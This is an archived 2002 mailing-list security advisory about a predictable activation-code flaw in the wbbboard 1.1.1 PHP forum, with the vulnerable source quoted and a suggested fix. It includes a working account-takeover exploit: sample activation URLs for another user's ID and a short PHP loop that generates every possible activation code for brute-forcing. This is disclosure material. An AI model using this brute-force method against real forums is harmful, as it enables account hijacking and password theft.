wbbboard 1.1.1 registration _new_users_vulnerability_

From: SeazoN (seazonat_private)
Date: Sun May 26 2002 - 07:11:17 PDT

  • Next message: Ben Laurie: "Re: Yahoo Messenger - Multiple Vulnerabilities" 

    wbbboard 1.1.1 registration _new_users_vulnerability_
--------------------------------------------------
wbbboard  : i cant find any contact info in credits :(
            i send a message to wbbhacks.de and mywbb.de
            (support forums), they didnt reply for 3
            days (i think enough)

Affected program         : wbbboard 1.1.1
Vendor                   : http://www.woltlab.de/
Vulnerability-Class      : security bug
OS specific              : No
Remote                   : Yes
Problem-Skill            : High for users waiting for registration activatin
                           None for activated users

SUMMARY

wbboard is php & mysql based forum.

Here some code(register.php)
---------------------------
$datum = date("s");
mt_srand($datum);
$z = mt_rand();
$db_zugriff->query("INSERT INTO bb".$n."_user_table
$db_zugriff->(username,userpassword,useremail,regemail,groupid,regdate,lastvisit,lastactivity,activation)
$db_zugriff->VALUES
$db_zugriff->('$name','$password','$email','$email','$default_group','$time','$time','$time',$z)");
---------------------------
after that script mail to userat_private with url for activation
here some code from action.php
---------------------------
if($action=="activation") {
        $result = activat($userid,$code);
        if($result == 1) eval ("\$output = \"".gettemplate("error1")."\";");
        if($result == 2) eval ("\$output = \"".gettemplate("error22")."\";");
        if($result == 3) eval ("\$output = \"".gettemplate("error23")."\";");
        if(!$result) {
                $user_id = $userid;
                eval ("\$output = \"".gettemplate("note21")."\";");
                $user_password = getUserPW($userid);
                session_register("user_id");
                session_register("user_password");
                setcookie("user_id", "$user_id", time()+(3600*24*365));
                setcookie("user_password", "$user_password", time()+(3600*24*365));
        }
        $ride = "main.php?styleid=$styleid$session";
}

IMPACT

You can steal NEW user account with his passwords.

EXPLOIT

Register in forum you will recieve a message like this:
To continue registration
http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322
Now You Know how many users on forum and can hijak users with
 userid=346(for example)
 
HEART OF EXPLOIT
----------------------
| $datum = date("s");|
| mt_srand($datum);  |  this code result only 30 original integer words :)
| $z = mt_rand();    |  i think it is not so hard to bruteforce
----------------------
http://forum.dom/forum/action.php?action=activation&userid=346&code=1898087491
http://forum.dom/forum/action.php?action=activation&userid=346&code=1309289693
....
http://forum.dom/forum/action.php?action=activation&userid=346&code=356268007

You can get all variations with this script
<?php
for($i=0; $i<60; $i++)
{
mt_srand($i);
echo mt_rand()."<BR>";
     ^^^^^^^^^ here you are :)
}
?>

 SOLUTION:
   use simple rand() or realy unpredictable md5(uniqid(rand(),1))

    This archive was generated by hypermail 2b30 : Mon May 27 2002 - 14:21:29 PDT